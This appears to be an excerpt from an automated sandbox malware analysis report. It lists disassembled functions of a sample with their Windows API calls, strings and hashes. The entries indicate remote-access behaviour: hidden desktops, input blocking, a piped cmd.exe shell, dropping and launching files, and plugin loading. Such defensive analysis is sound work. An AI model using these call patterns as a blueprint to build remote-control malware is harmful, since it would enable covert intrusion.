                                Function 033150BD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 193filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 033151AC
                                • FindFirstFileA.KERNEL32(?,?), ref: 03315200
                                • lstrcpy.KERNEL32(?,?), ref: 03315230
                                • FindNextFileA.KERNEL32(?,00000010), ref: 03315452
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFindlstrcpy$FirstNext
                                • String ID: \
                                • API String ID: 2764145207-2967466578
                                • Opcode ID: e3792f459deae386a19d2ed2d755906de959bb27b1f41df5fd42573d08e13f4e
                                • Instruction ID: 5ed04688704dbfc39ce51c1983e075c79a39f95ab8af705cb3774c10d8e18306
                                • Opcode Fuzzy Hash: e3792f459deae386a19d2ed2d755906de959bb27b1f41df5fd42573d08e13f4e
                                • Instruction Fuzzy Hash: DD61B2765083859FEB25CF608CD4BEBBFAAEF87304F084899E5C48B151D732951ACB52
                                Function 03319404 Relevance: 9.1, APIs: 6, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetLogicalDriveStringsA.KERNEL32(000001F4,?), ref: 03319446
                                • QueryDosDeviceA.KERNEL32(?,?,00000064), ref: 033194B3
                                • lstrlen.KERNEL32(?), ref: 033194C1
                                • lstrcpy.KERNEL32(?), ref: 033194F6
                                • lstrcpy.KERNEL32(?,?), ref: 0331951D
                                • lstrcat.KERNEL32(?,?), ref: 0331952D
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$DeviceDriveLogicalQueryStringslstrcatlstrlen
                                • String ID:
                                • API String ID: 140800143-0
                                • Opcode ID: a934251057859d7fa64e4ce96b0f28a3be7aef8b3b226a0fb66c16e968c74604
                                • Instruction ID: 62597e2f2d052adcc2651119b6029f4807dfec1e06facfc09a66de542b509191
                                • Opcode Fuzzy Hash: a934251057859d7fa64e4ce96b0f28a3be7aef8b3b226a0fb66c16e968c74604
                                • Instruction Fuzzy Hash: 3131C77190526D9FEB24DBA58CD8BEEB7B9EF05200F0801E5E908E3150DF359E94CBA4
                                Function 03318334 Relevance: 9.1, APIs: 6, Instructions: 88windowkeyboardCOMMON
                                Download Yara Rule
                                APIs
                                • EnumDisplaySettingsA.USER32(00000000,000000FF,?), ref: 03318391
                                • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 033183CF
                                • PostMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 033183E6
                                • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 03318406
                                • PostMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 0331841D
                                • BlockInput.USER32(00000000), ref: 03318442
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoMessageParametersPostSystem$BlockDisplayEnumInputSettings
                                • String ID:
                                • API String ID: 3716559231-0
                                • Opcode ID: 6c3ac16c9ab6000d2529520185f0dd5039f3c03020141213c0fe00495de88622
                                • Instruction ID: 69b568f5175eebecc06d107761f36576c39ee4268e3231125a94883848a7c931
                                • Opcode Fuzzy Hash: 6c3ac16c9ab6000d2529520185f0dd5039f3c03020141213c0fe00495de88622
                                • Instruction Fuzzy Hash: 2A31D130744354ABF725CB68CCCAF69B7A2AB05B10F184164F6149F1D1CBF0A880DB29
                                Function 03321124 Relevance: 9.1, APIs: 6, Instructions: 62threadsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03321254: GetWindowsDirectoryA.KERNEL32(?,00000104,1006421C), ref: 03321289
                                  • Part of subcall function 03321254: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 033212CA
                                  • Part of subcall function 03321254: wsprintfA.USER32 ref: 03321349
                                • OpenDesktopA.USER32(1008C550,00000000,00000001,10000000), ref: 033211A0
                                • CreateDesktopA.USER32(1008C550,00000000,00000000,00000000,10000000,00000000), ref: 033211BD
                                • SetThreadDesktop.USER32(00000000), ref: 033211C9
                                • CreateThread.KERNEL32(00000000,00000000,1002EEE0,?,00000000,00000000), ref: 033211DF
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 033211ED
                                • CloseHandle.KERNEL32 ref: 033211F9
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Desktop$CreateThread$CloseDirectoryHandleInformationObjectOpenSingleVolumeWaitWindowswsprintf
                                • String ID:
                                • API String ID: 324691535-0
                                • Opcode ID: b0618d5338cb2efc99c3c68f589429552852256bec485e36338a00296a30f454
                                • Instruction ID: 31c0417bd03f44dd520cd2098fd92606056bb9b50a6dcdb1b904b25be1d59892
                                • Opcode Fuzzy Hash: b0618d5338cb2efc99c3c68f589429552852256bec485e36338a00296a30f454
                                • Instruction Fuzzy Hash: 892136B0D50B28ABFB129FA0EDC9F553AB6F785344F104217F600996A0EBB131C48F98
                                Function 0334D641 Relevance: 7.8, APIs: 5, Instructions: 253COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03340100: GetLastError.KERNEL32(?,?,?,03330D62,?,?,?,?,03330E2D,?,?,10085840), ref: 03340105
                                  • Part of subcall function 03340100: SetLastError.KERNEL32(00000000,100811E4,000000FF,?,03330E2D,?,?,10085840), ref: 033401A3
                                • GetACP.KERNEL32 ref: 0334D702
                                • IsValidCodePage.KERNEL32(00000000), ref: 0334D72D
                                • _wcschr.LIBVCRUNTIME ref: 0334D7C1
                                • _wcschr.LIBVCRUNTIME ref: 0334D7CF
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0334D892
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                • String ID:
                                • API String ID: 4147378913-0
                                • Opcode ID: 9861e490a47c1469057b99505394025accb8669d8d38808db69c73e2d134e422
                                • Instruction ID: edb9d250988ee2508e47f3f1d0b212ff07244c791f5fc1c88fc46a868059ebaf
                                • Opcode Fuzzy Hash: 9861e490a47c1469057b99505394025accb8669d8d38808db69c73e2d134e422
                                • Instruction Fuzzy Hash: C871F535A00306AAEB25EB35CCC1BBAB3ECEF49711F184469E909DB592EB74F540C760
                                Function 033436E1 Relevance: 4.7, APIs: 3, Instructions: 173timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1006A608), ref: 0334374B
                                • _free.LIBCMT ref: 03343739
                                  • Part of subcall function 0333F9D6: HeapFree.KERNEL32(00000000,00000000,?,0334CAA3,03345C0B,00000000,03345C0B,?,?,0334CD48,03345C0B,00000007,03345C0B,?,0334AD5A,03345C0B), ref: 0333F9EC
                                  • Part of subcall function 0333F9D6: GetLastError.KERNEL32(03345C0B,?,0334CAA3,03345C0B,00000000,03345C0B,?,?,0334CD48,03345C0B,00000007,03345C0B,?,0334AD5A,03345C0B,03345C0B), ref: 0333F9FE
                                • _free.LIBCMT ref: 03343907
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 2155170405-0
                                • Opcode ID: 2d30d65b3a41b017e37e8ddfb0079a93fff8431f5cd9ca959ce1403f3bdf5965
                                • Instruction ID: e60af6b4f2e12ddc08e03400c9d6268e816e6199778b7896c32250933eb2405e
                                • Opcode Fuzzy Hash: 2d30d65b3a41b017e37e8ddfb0079a93fff8431f5cd9ca959ce1403f3bdf5965
                                • Instruction Fuzzy Hash: F751EB79D00319EBDB11EF698CC49AABBFCFF45230B14469BE454E7290EB30A954CB50
                                Function 0331856C Relevance: 1.5, APIs: 1, Instructions: 20keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • keybd_event.USER32(00000000,00000000,?,00000000), ref: 0331857B
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: keybd_event
                                • String ID:
                                • API String ID: 2665452162-0
                                • Opcode ID: 26f4dd3d943bff316407567fc3f6adbba3ba78951239f6293a59e5b0951a29ae
                                • Instruction ID: 4fc215d751768c0ef01f45836464f9d37312d2c0ef90cd8a968499013abbb348
                                • Opcode Fuzzy Hash: 26f4dd3d943bff316407567fc3f6adbba3ba78951239f6293a59e5b0951a29ae
                                • Instruction Fuzzy Hash: CAD0A7337442245BE138DBADACCAF34B75FFB95711F210162FA009E1D2DE9654309728
                                Function 0330A1F4 Relevance: 1.5, APIs: 1, Instructions: 17shutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03312674: LoadLibraryW.KERNEL32(100782C8), ref: 0331268F
                                  • Part of subcall function 03312674: LoadLibraryW.KERNEL32(10077444), ref: 033126C2
                                  • Part of subcall function 03312674: GetProcAddress.KERNEL32(00000000,10077470), ref: 033126D0
                                • ExitWindowsEx.USER32(?,00000000), ref: 0330A20B
                                  • Part of subcall function 03312674: LoadLibraryW.KERNEL32(100784DC), ref: 0331272F
                                  • Part of subcall function 03312674: GetProcAddress.KERNEL32(00000000,100784F8), ref: 0331273B
                                  • Part of subcall function 03312674: CloseHandle.KERNEL32(?), ref: 03312755
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$CloseExitHandleWindows
                                • String ID:
                                • API String ID: 2392996298-0
                                • Opcode ID: 3ea7901086e65344f11d79aca33693397c5ccc75f64198f2e58b2052378a8d7d
                                • Instruction ID: cf05899f4a8c529454fe1289fb921517a3e5d21254b3cbf1f3afbb4572d89651
                                • Opcode Fuzzy Hash: 3ea7901086e65344f11d79aca33693397c5ccc75f64198f2e58b2052378a8d7d
                                • Instruction Fuzzy Hash: 19D02231930B2412E22C7378AC8AB97328ECB46220F044762AC10AA2C0ACE6AA2001DD
                                Function 03349223 Relevance: 33.2, APIs: 22, Instructions: 188synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 033508F8: _free.LIBCMT ref: 0335091A
                                • _free.LIBCMT ref: 03349294
                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03349357
                                • GetExitCodeProcess.KERNEL32(?,?), ref: 03349364
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03349379
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03349384
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0334938F
                                • __dosmaperr.LIBCMT ref: 03349396
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 033493A1
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 033493AC
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 033493BE
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 033493C9
                                • _free.LIBCMT ref: 03349289
                                  • Part of subcall function 0333F9D6: HeapFree.KERNEL32(00000000,00000000,?,0334CAA3,03345C0B,00000000,03345C0B,?,?,0334CD48,03345C0B,00000007,03345C0B,?,0334AD5A,03345C0B), ref: 0333F9EC
                                  • Part of subcall function 0333F9D6: GetLastError.KERNEL32(03345C0B,?,0334CAA3,03345C0B,00000000,03345C0B,?,?,0334CD48,03345C0B,00000007,03345C0B,?,0334AD5A,03345C0B,03345C0B), ref: 0333F9FE
                                • _free.LIBCMT ref: 033492C2
                                • _free.LIBCMT ref: 033492CD
                                • _free.LIBCMT ref: 033492D8
                                • _free.LIBCMT ref: 033493D4
                                • _free.LIBCMT ref: 033493E0
                                • _free.LIBCMT ref: 033493EC
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 033493FA
                                • _free.LIBCMT ref: 03349403
                                • _free.LIBCMT ref: 0334940F
                                • _free.LIBCMT ref: 0334941B
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                • String ID:
                                • API String ID: 3529756214-0
                                • Opcode ID: f89c313329530165e33727de20b3d365a58936ccbb6a1bad69924e242e7bb26a
                                • Instruction ID: e76659846df6eb3cfda075c3c67d8833c90b3174501b5b33b8e198df39402212
                                • Opcode Fuzzy Hash: f89c313329530165e33727de20b3d365a58936ccbb6a1bad69924e242e7bb26a
                                • Instruction Fuzzy Hash: ED517C75D00218FBDF21EF90CCC4BEEBBBAEF42251F148066F911AA150EB715A44DB51
                                Function 0331C73D Relevance: 31.7, APIs: 21, Instructions: 169stringservicememoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Service$Local$AllocCloseHandle$Config2OpenQuerySize
                                • String ID:
                                • API String ID: 2923880368-0
                                • Opcode ID: 80ba6aa7e0b711941c03ff3e415742644fb0cbb614aff1b030816c46d1ab5f90
                                • Instruction ID: 69ddc1901ffe4a438f6bc9422bf4a70834f493327c592ea2e8ab34ea864cbadf
                                • Opcode Fuzzy Hash: 80ba6aa7e0b711941c03ff3e415742644fb0cbb614aff1b030816c46d1ab5f90
                                • Instruction Fuzzy Hash: 2251DF71D01225AFEF259BA4CCC8E9E7B7AFF44305F058091E649E3210DE759A65CF50
                                Function 0331C752 Relevance: 31.7, APIs: 21, Instructions: 169stringservicememoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Service$Local$AllocCloseHandle$Config2OpenQuerySize
                                • String ID:
                                • API String ID: 2923880368-0
                                • Opcode ID: 693bfbcee45904cbabed831587b9f1947cdae841f2feaac9f0577934b10a9c3f
                                • Instruction ID: 5ff7a64959fbcbb9442bdc39d74c24cefdee55cc82f2836c7f2a4ca2211d0db9
                                • Opcode Fuzzy Hash: 693bfbcee45904cbabed831587b9f1947cdae841f2feaac9f0577934b10a9c3f
                                • Instruction Fuzzy Hash: EB51EF71D01225AFEF259BA4CCC8E9E7B7AFF44305F058091E649E3210DE759A65CF50
                                Function 0331C759 Relevance: 31.7, APIs: 21, Instructions: 169stringservicememoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Service$Local$AllocCloseHandle$Config2OpenQuerySize
                                • String ID:
                                • API String ID: 2923880368-0
                                • Opcode ID: ab0d7cfe39889146013aa53246daf3a6ca8eafd7212dcedf579d756cd7a4ac97
                                • Instruction ID: 9bb61b7df0f0b47e448caf4e30210f85d272bf9e039d2a9814e6c27cb356524e
                                • Opcode Fuzzy Hash: ab0d7cfe39889146013aa53246daf3a6ca8eafd7212dcedf579d756cd7a4ac97
                                • Instruction Fuzzy Hash: A751DF71D01225AFEF259BA4CCC8E9E7B7AFF44305F058091E649E3210DE759A65CF50
                                Function 0331C744 Relevance: 31.7, APIs: 21, Instructions: 169stringservicememoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Service$Local$AllocCloseHandle$Config2OpenQuerySize
                                • String ID:
                                • API String ID: 2923880368-0
                                • Opcode ID: 8da233f77c3064411a6f0c07623486572e3a8aa6b507e7cfc049aa8042c213e5
                                • Instruction ID: aee005001012bbbd802fa004d95de4b6585f2f000d86790e903ed434ade67dd1
                                • Opcode Fuzzy Hash: 8da233f77c3064411a6f0c07623486572e3a8aa6b507e7cfc049aa8042c213e5
                                • Instruction Fuzzy Hash: 9951DF71D01225AFEF259BA4CCC8E9E7B7AFF44305F058091E649E3210DE759AA5CF50
                                Function 0331C74B Relevance: 31.7, APIs: 21, Instructions: 169stringservicememoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Service$Local$AllocCloseHandle$Config2OpenQuerySize
                                • String ID:
                                • API String ID: 2923880368-0
                                • Opcode ID: d90dbaa57ea9804171904937fed8e37a5c3dee26926026066fe22e7fabcc9d45
                                • Instruction ID: dd55dbbb4278601c431d69168145ede5d685b3e168e17bf90f4d2352fd93a92a
                                • Opcode Fuzzy Hash: d90dbaa57ea9804171904937fed8e37a5c3dee26926026066fe22e7fabcc9d45
                                • Instruction Fuzzy Hash: D651DF71D01225AFEF259BA4CCC8E9E7BBAFF44305F058091E649E3210DE759A65CF50
                                Function 0331A7E4 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 208COMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?), ref: 0331A808
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0331A866
                                • CloseHandle.KERNEL32(00000000), ref: 0331A875
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventFileHandleSize
                                • String ID: Disable$Enable
                                • API String ID: 2912433508-1261744749
                                • Opcode ID: 4be66c07e23b66b8716fd74f3d74097fa36b7ba15cfccae8b4bf150c71b7b7c4
                                • Instruction ID: 4634cf60185c893879d77def61a24ba7e985240ecc71a4f5588a873765ab963a
                                • Opcode Fuzzy Hash: 4be66c07e23b66b8716fd74f3d74097fa36b7ba15cfccae8b4bf150c71b7b7c4
                                • Instruction Fuzzy Hash: 4A61BD34D003646BEF29DF748CC4BA8BF27EF46311F198259ED856F152EB7155A28350
                                Function 032FD216 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 113libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 032FD227
                                • LoadLibraryW.KERNEL32(10076B8C), ref: 032FD232
                                • GetProcAddress.KERNEL32(00000000,10076BA0), ref: 032FD244
                                • FreeLibrary.KERNEL32(00000000), ref: 032FD273
                                • wsprintfW.USER32 ref: 032FD2BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeLoadProcVersionwsprintf
                                • String ID: Windows 2000$Windows 8.1$Windows 95$Windows 98$Windows Me$Windows NT 4.0$Windows Server 2003$Windows XP
                                • API String ID: 960095762-1243545234
                                • Opcode ID: ee1d06c05365182ca95f3273de61282ea058a365b5a6565ec2d8b2e127c192be
                                • Instruction ID: 55dd30a9367691a11eb777a3857e7c9042223d842cceaa46b5742b53455ef358
                                • Opcode Fuzzy Hash: ee1d06c05365182ca95f3273de61282ea058a365b5a6565ec2d8b2e127c192be
                                • Instruction Fuzzy Hash: 9B41C131A241158FCB29DB648C58BBDF366FB89300F0441AAE70B96794CF349AC0CF85
                                Function 0333B35F Relevance: 22.8, APIs: 15, Instructions: 343COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: b62af4e86575ffd95100043b4822eeefb74852ed47b7fe10f58efd582cba9bd1
                                • Instruction ID: f3f9cf05f55d1327fe32ec1e6f4a4e537f82d56f20400467c8081a3cb749ae65
                                • Opcode Fuzzy Hash: b62af4e86575ffd95100043b4822eeefb74852ed47b7fe10f58efd582cba9bd1
                                • Instruction Fuzzy Hash: 8FD17C75D00345AFDB21DFA4C8C0BEEFBB5FF09300F188169E995AB251D675A845CB60
                                Function 03324444 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 213COMMON
                                Download Yara Rule
                                APIs
                                • LoadCursorA.USER32(00000000,?), ref: 033244C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: CursorLoad
                                • String ID:
                                • API String ID: 3238433803-3916222277
                                • Opcode ID: f754fece3877dab23088e59e14148b4fbfdcd43420c8be63f2e92ca1eee363fa
                                • Instruction ID: bcbfa7f5eab4d56abb39546d9fe0e485c56bb7f3b0e6d79468ef9e4db324346a
                                • Opcode Fuzzy Hash: f754fece3877dab23088e59e14148b4fbfdcd43420c8be63f2e92ca1eee363fa
                                • Instruction Fuzzy Hash: 36912671900264EFEF159F64CCC5B597FA6FF08300F1541AAEE459F2AADB729850CB90
                                Function 03311304 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 485fileCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 03311581
                                • wsprintfA.USER32 ref: 033115A0
                                  • Part of subcall function 0330BF74: GetProcessHeap.KERNEL32(00000000,00000014), ref: 0330BFD9
                                  • Part of subcall function 0330BF74: RtlAllocateHeap.NTDLL(00000000), ref: 0330BFE0
                                  • Part of subcall function 0330BF74: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0330C090
                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 033115BF
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 033115D5
                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 03311628
                                • CloseHandle.KERNEL32(00000000), ref: 03311638
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Heap$AllocAllocateCloseCreateFolderHandlePathProcessSizeSpecialVirtualWritewsprintf
                                • String ID: ARPD$PluginMe$getDllName$isARDll$isCSDll
                                • API String ID: 268699387-2378132350
                                • Opcode ID: 09a956d3fe6812d4625542448020c736dbc657e0b92537914c5c32e51254f5a0
                                • Instruction ID: 32647b76651ea23e8304ad5441531879bd99229b1d0c36d9d23d3739a65e03ed
                                • Opcode Fuzzy Hash: 09a956d3fe6812d4625542448020c736dbc657e0b92537914c5c32e51254f5a0
                                • Instruction Fuzzy Hash: D602F475E006288BDB28CB28CDD4BEEF775AF45302F1482D8D609AB284DB759B95CF50
                                Function 03318694 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 217pipeprocessstringCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 033186D0
                                • CreatePipe.KERNEL32 ref: 03318763
                                • CreatePipe.KERNEL32(00000000,00000000,?,00000000), ref: 033187AB
                                • GetStartupInfoA.KERNEL32(?), ref: 033187F1
                                • GetSystemDirectoryA.KERNEL32 ref: 03318835
                                • lstrcat.KERNEL32 ref: 03318869
                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,?,?,?,?), ref: 0331888F
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,?,?,?,?), ref: 033188FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$Pipe$DirectoryEventInfoObjectProcessSingleStartupSystemWaitlstrcat
                                • String ID: .exe$D$\cmd
                                • API String ID: 2606278758-2440019170
                                • Opcode ID: c40a5a4c374e805e51cb171429ebad17f03bf0efe3d7f58f5a2d448c3bc8b952
                                • Instruction ID: 3c18a1c10d4f8e86ff865db8f2a6eb7bd1e20fcb2a9cadaa3ee4c5baacd889cb
                                • Opcode Fuzzy Hash: c40a5a4c374e805e51cb171429ebad17f03bf0efe3d7f58f5a2d448c3bc8b952
                                • Instruction Fuzzy Hash: 88813C71604355AFE320DF65CC85F9BBBE9AF88710F10091EF689DB290DBB0A544CB96
                                Function 033031F4 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 229fileprocessCOMMON
                                Download Yara Rule
                                APIs
                                • _wcsrchr.LIBVCRUNTIME ref: 03303213
                                • GetTempPathW.KERNEL32(00000104,?), ref: 0330323A
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 03303282
                                • CloseHandle.KERNEL32(00000000), ref: 0330328E
                                • DeleteFileW.KERNEL32(?), ref: 0330329B
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,00000000,?), ref: 033033E4
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000,00000000,?), ref: 0330342F
                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 033034CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Create$CloseDeleteHandlePathProcessTempWrite_wcsrchr
                                • String ID: <$D
                                • API String ID: 2398361806-1382654409
                                • Opcode ID: 4b24f8cc813f455d4843aaca38f23d8a3f5c6d8a18520091160660dd8bf7b8bb
                                • Instruction ID: 1ceb06b1c2cc7655f6acab64b8e8f73330eee0bdbd9e566b5acdd15661cccfb9
                                • Opcode Fuzzy Hash: 4b24f8cc813f455d4843aaca38f23d8a3f5c6d8a18520091160660dd8bf7b8bb
                                • Instruction Fuzzy Hash: 33814175D00229ABEB21DB61CCC5BEAB7FAFB49750F054195F608A6190DFB09BC48F60
